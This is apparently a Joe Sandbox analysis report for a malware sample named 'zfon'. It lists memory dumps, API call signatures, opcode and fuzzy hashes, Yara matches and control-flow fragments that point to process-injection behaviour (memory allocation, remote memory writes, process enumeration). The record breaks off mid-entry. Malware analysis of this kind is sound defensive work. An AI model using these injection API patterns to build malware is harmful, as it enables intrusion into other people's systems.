                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1452528299-0
                                                                                                • Opcode ID: 868a6d6a1edc03e792c9974cc9c9f69a97d5c8a62993b42da19d3e438dcd092c
                                                                                                • Instruction ID: 6e23da31541fa1c5309176efc7d8b00789d56b685ff5d0457bd8d56831bd4bf7
                                                                                                • Opcode Fuzzy Hash: 868a6d6a1edc03e792c9974cc9c9f69a97d5c8a62993b42da19d3e438dcd092c
                                                                                                • Instruction Fuzzy Hash: 65117568E0970787FA3CA7ADA8021386755AF447E9F14A674DB2E473D4DE3CF4518700
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF8BFB56CE9,?,?,?,?,00007FF8BFB605B2,?,?,?,?,?), ref: 00007FF8BFB56E83
                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF8BFB56CE9,?,?,?,?,00007FF8BFB605B2,?,?,?,?,?), ref: 00007FF8BFB56F0C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1452528299-0
                                                                                                • Opcode ID: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                                • Instruction ID: 48fd67f93faa6d6a3d199ab5748549f4bb91a93093c5a15e19bf58d72bd2ecb8
                                                                                                • Opcode Fuzzy Hash: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                                • Instruction Fuzzy Hash: 1E117F20F1E74792FA119BADA8641347392AF487E0F184638DB2E073D5DE3CF841C610
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 21e29c9922f19bdda75fb578db1eebbd38709f35706a816a21095b56aee0f4f3
                                                                                                • Instruction ID: 11113d1c6687d6315d471f8ca99ecb26f6db8220d6f80e47674e1a0263757f19
                                                                                                • Opcode Fuzzy Hash: 21e29c9922f19bdda75fb578db1eebbd38709f35706a816a21095b56aee0f4f3
                                                                                                • Instruction Fuzzy Hash: 88F0E726B58B82A2EB44AF1AF9942682334FB88BD0B544471CB4E43B70DF3CE4A59300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 2301427b651c3a47193e5a8d6ad951242187ad620a5bd31deb8cfb3ac87ac41d
                                                                                                • Instruction ID: 89392b1d4d9deb7f04fdc116e5588abeb52be545ff266be0e380937833636288
                                                                                                • Opcode Fuzzy Hash: 2301427b651c3a47193e5a8d6ad951242187ad620a5bd31deb8cfb3ac87ac41d
                                                                                                • Instruction Fuzzy Hash: C5F0E726B58B82A2EB44AF1AF9942682330FB88FD0F544471CB4D43B70DF2CE4A59300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 1505eafe45e457f4db7c5ee298ec8fe61a246f9253c397c6ee0353011936a2de
                                                                                                • Instruction ID: edefc2c7c387e2af68a692bdf5cf12e7550f99ceb3fc66b6c556616258980fec
                                                                                                • Opcode Fuzzy Hash: 1505eafe45e457f4db7c5ee298ec8fe61a246f9253c397c6ee0353011936a2de
                                                                                                • Instruction Fuzzy Hash: 18F09726B5DB82A2EB44AF1AF9942782375FB88BD0F544471DB4D43B74DF2CE4A59300

                                                                                                Execution Graph

                                                                                                Execution Coverage:1.2%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:16.2%
                                                                                                Total number of Nodes:345
                                                                                                Total number of Limit Nodes:45
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Section$ViewVirtual$Protect$AllocCreateUnmap
                                                                                                • String ID: @
                                                                                                • API String ID: 814226357-2766056989
                                                                                                • Opcode ID: 537dcba744a9e5ab819796c1abf8ff142b8021ff1599a3d2e9f8c20dbb037682
                                                                                                • Instruction ID: 28b16e948e1d79fc0bc33cee952a52bcf7c8114267e3dcb8e24a56d3f6839862
                                                                                                • Opcode Fuzzy Hash: 537dcba744a9e5ab819796c1abf8ff142b8021ff1599a3d2e9f8c20dbb037682
                                                                                                • Instruction Fuzzy Hash: AF62DD32A14A81C7EB64DF25E8406AEB3B5FB48BA8F804135DB5D47B88DF39E590C750

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocMemoryProcessVirtualWrite_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2518834501-0
                                                                                                • Opcode ID: 3929f3d7caecdf5a166518e108926a526826c599736ea3d0cce582099cd9f6e0
                                                                                                • Instruction ID: c98c814a20aa542ab351b587ffa1179137c7f71353b7f1e7b1708247f6756664
                                                                                                • Opcode Fuzzy Hash: 3929f3d7caecdf5a166518e108926a526826c599736ea3d0cce582099cd9f6e0
                                                                                                • Instruction Fuzzy Hash: B1227034514A4E8FEB95EF68C4A97EAB3E2FB98300F50465AE44EC3192DF749D80C742

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32_invalid_parameter_noinfo
                                                                                                • String ID:
                                                                                                • API String ID: 3417858151-0
                                                                                                • Opcode ID: 58fc19107ec0e66d273cc40dc8bc3f342268e8061c34a6a0b169b5af377fc60a
                                                                                                • Instruction ID: 9bdf5e2f6eec8967736945abf0ac61dd4cbc761a384dad1a0b8031a7360dc7d7
                                                                                                • Opcode Fuzzy Hash: 58fc19107ec0e66d273cc40dc8bc3f342268e8061c34a6a0b169b5af377fc60a
                                                                                                • Instruction Fuzzy Hash: 66415374508B598FE794EF28D49875AB7E2FB98310F5046AAE40DC7296DB34CC44CB82

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: InformationProcessQuery__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2261429478-0
                                                                                                • Opcode ID: c26532dd56cd671d0a1b3ad32ebf9ddf33ffb71fd6066d7300b13c4462bb992f
                                                                                                • Instruction ID: 53d281e224da8aba560b543999a597d32f44e1eb2c70ff81d9289342420a55c2
                                                                                                • Opcode Fuzzy Hash: c26532dd56cd671d0a1b3ad32ebf9ddf33ffb71fd6066d7300b13c4462bb992f
                                                                                                • Instruction Fuzzy Hash: E3517930624E494FDB58EF2CD499B6AB7D2FB95310F60461FE04AC3296DA71AC85C783

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                                                • Instruction ID: 3b5bb721b5dcca3fad783427ff3c65d7826403b61e1627fbf4fabd92c5b05cc8
                                                                                                • Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                                                                • Instruction Fuzzy Hash: 71B1B521B28542C2EB6CEE21D9456BDA3B1FB44BA4F844135DE2D476C9DF3CE4A1C7A0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle
                                                                                                • String ID:
                                                                                                • API String ID: 4069755476-0
                                                                                                • Opcode ID: 52794ae43ef133f375a4d7fa53b1f961356637d67dbba59633ce44484efc1cfd
                                                                                                • Instruction ID: aa72cd42bc3cbba31a93ca252c4261053a2febf6a4f14548ccbedda04c6865e5
                                                                                                • Opcode Fuzzy Hash: 52794ae43ef133f375a4d7fa53b1f961356637d67dbba59633ce44484efc1cfd
                                                                                                • Instruction Fuzzy Hash: 18C1DB34618E1E8FDF64EF28C498B9AB7D2FBD8310F644A0AD04AC7295DA75DC85C742

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: l
                                                                                                • API String ID: 1029625771-2517025534
                                                                                                • Opcode ID: 1d083b3de9a9ed48a996e456de89af2bb64d5134e63aa677a92d7ef34e970a50
                                                                                                • Instruction ID: fcbc9adab92d3621250cbe816dc2ca8ae3e3c141a7004ed5b328f5b5596f4f2f
                                                                                                • Opcode Fuzzy Hash: 1d083b3de9a9ed48a996e456de89af2bb64d5134e63aa677a92d7ef34e970a50
                                                                                                • Instruction Fuzzy Hash: C321DD22A2C6D5C6EB519F24F444329ABA0F759BD8F581375CF9E07B98CB2DD0A48720

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandleInformationProcessQuery
                                                                                                • String ID:
                                                                                                • API String ID: 1431398230-0
                                                                                                • Opcode ID: 8892a3de4c354403ffd96d30362b0f6fa85d71dbda6d833dead5add144ef140a
                                                                                                • Instruction ID: bfb34021917273949c0546f53a0d9a2eeee6352c4847f242639a2189c2c1e023
                                                                                                • Opcode Fuzzy Hash: 8892a3de4c354403ffd96d30362b0f6fa85d71dbda6d833dead5add144ef140a
                                                                                                • Instruction Fuzzy Hash: AF51B53091CB588FDB58EF1CD8846A6B7E1FBA9310F104A5EF489C7256DB709884CB82

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: fd99b70dfc6966dce4256ea9522189a526efb06900cfd91d0ed215b37b37ac08
                                                                                                • Instruction ID: ff5b1bf972942e55c0252ce18b7b4314d5019c2f76be7396e32e04661d4f1a5e
                                                                                                • Opcode Fuzzy Hash: fd99b70dfc6966dce4256ea9522189a526efb06900cfd91d0ed215b37b37ac08
                                                                                                • Instruction Fuzzy Hash: CC012930618A0C4FE794DF1CE4497A9B6E1FBAC310F6042AAA40DC7266DA749985CB81

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: e2d03e14ecea67ae3140c875a343d63f63740cbf0b01b1a0b106d18d7c617194
                                                                                                • Instruction ID: b49cc3c20142cd51a4064eca0100786f4702a82c5a03e11474d089ca142f5318
                                                                                                • Opcode Fuzzy Hash: e2d03e14ecea67ae3140c875a343d63f63740cbf0b01b1a0b106d18d7c617194
                                                                                                • Instruction Fuzzy Hash: 6BF0FF30614A4A4BE709EB74D8A92A773D2FB94300F60492AF443C21A2EE68D945C682

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free
                                                                                                • String ID:
                                                                                                • API String ID: 3978063606-0
                                                                                                • Opcode ID: d64f5b2062c7967b43152f63818274d0a04062ae98c3a6f56fe57c2b33e813dc
                                                                                                • Instruction ID: 594b9c75ff9649d56af4ff4b45b153aee3789c31a63a0bead539bb11d4b8c034
                                                                                                • Opcode Fuzzy Hash: d64f5b2062c7967b43152f63818274d0a04062ae98c3a6f56fe57c2b33e813dc
                                                                                                • Instruction Fuzzy Hash: 74F0E5342008088BE71DABB6EDC956033A5E749311F500B2AE52BC71E1EB3A5859C743

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 687 2dc4beae518-2dc4beae51b 688 2dc4beae51d-2dc4beae536 RtlFreeHeap 687->688 689 2dc4beae553 687->689 690 2dc4beae538-2dc4beae547 call 2dc4bea06d8 call 2dc4bea07ac 688->690 691 2dc4beae54e-2dc4beae552 688->691 690->691 691->689
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: 8f455e8927717cf74da2ea1d6b0ff16729446bc41146d6effb8fe588f7080467
                                                                                                • Instruction ID: 9b4b7b08dc1b9ef4b211c4bf88a1662f1adb1eaae84980d8aedde3e10adacd7d
                                                                                                • Opcode Fuzzy Hash: 8f455e8927717cf74da2ea1d6b0ff16729446bc41146d6effb8fe588f7080467
                                                                                                • Instruction Fuzzy Hash: B7E0C234702A0707FF1C67BAACAD27B328B9BCD201F248426FC01C619AEE298C40C642

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 696 2dc4be546b0-2dc4be546ce 697 2dc4be546d0-2dc4be546da 696->697 698 2dc4be546f9-2dc4be54700 696->698 697->698 701 2dc4be546dc-2dc4be546ee CloseHandle 697->701 699 2dc4be54702-2dc4be5470c 698->699 700 2dc4be54729-2dc4be54738 698->700 699->700 703 2dc4be5470e-2dc4be5471e 699->703 701->698 702 2dc4be546f0-2dc4be546f4 701->702 702->698 703->700 705 2dc4be54720-2dc4be54724 703->705 705->700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2962429428-0
                                                                                                • Opcode ID: 86e0eb6f4946c0b3aae63fa0a3b42eecc3b4de38385dd7f2f15c74cfef035e0a
                                                                                                • Instruction ID: 1ac56ab9ffa00f09623bd4d69c164ea09ad1bcf757e21d59e154f7c992adf454
                                                                                                • Opcode Fuzzy Hash: 86e0eb6f4946c0b3aae63fa0a3b42eecc3b4de38385dd7f2f15c74cfef035e0a
                                                                                                • Instruction Fuzzy Hash: 2B114C34604A298FDFD0EF5DC4D8B1577E1FB99331B584569E40ACB259D634CC45CB81
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 552761200-0
                                                                                                • Opcode ID: a7f2bf8d6ee9c32b1490e42ad02cb0604fc4ff821b5949c4f80fc3c9d251ac62
                                                                                                • Instruction ID: a5be9f0a4b6f8ce97231c6e5f949d5f3e8038d4a103d19a5abe4e942f2fa5e95
                                                                                                • Opcode Fuzzy Hash: a7f2bf8d6ee9c32b1490e42ad02cb0604fc4ff821b5949c4f80fc3c9d251ac62
                                                                                                • Instruction Fuzzy Hash: 2AE197352187064BEB59EF28D8B96A777E7FB88340F60452BE446C72D2DA34DC41C786
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: cef_string_utf16_clear$cef_string_utf16_set$cef_string_multimap_keycef_string_multimap_sizecef_string_multimap_valuecef_string_utf16_cmp
                                                                                                • String ID:
                                                                                                • API String ID: 1610809521-0
                                                                                                • Opcode ID: 2fd182909d36940ed77f8fa1be500dae443977ddcc0a19fb9f2af5057e379218
                                                                                                • Instruction ID: 736b6be1bf5834385223905e11bf631e47d71a92c3f0c302accfdfb7f8045fcb
                                                                                                • Opcode Fuzzy Hash: 2fd182909d36940ed77f8fa1be500dae443977ddcc0a19fb9f2af5057e379218
                                                                                                • Instruction Fuzzy Hash: A6B16022609B8185EB96AF15AC4476AB7B1FF49BC0F988034DA5D077E8EF3CD444C3A0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                • String ID: 0
                                                                                                • API String ID: 1944019136-4108050209
                                                                                                • Opcode ID: ba49a7cfee16781f8ea1fd221730e21fb97c5df0ad4d632842d7b8982b924624
                                                                                                • Instruction ID: c11f0f6ad00bbd44c2999f16e01f29ae81f747fdc13a2d1552a4a634247ba42c
                                                                                                • Opcode Fuzzy Hash: ba49a7cfee16781f8ea1fd221730e21fb97c5df0ad4d632842d7b8982b924624
                                                                                                • Instruction Fuzzy Hash: 69E1EB35514E8D8FEB54EF28C898BEA77E2FBA9300F604A1AE449C3192DB74DD85C741
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
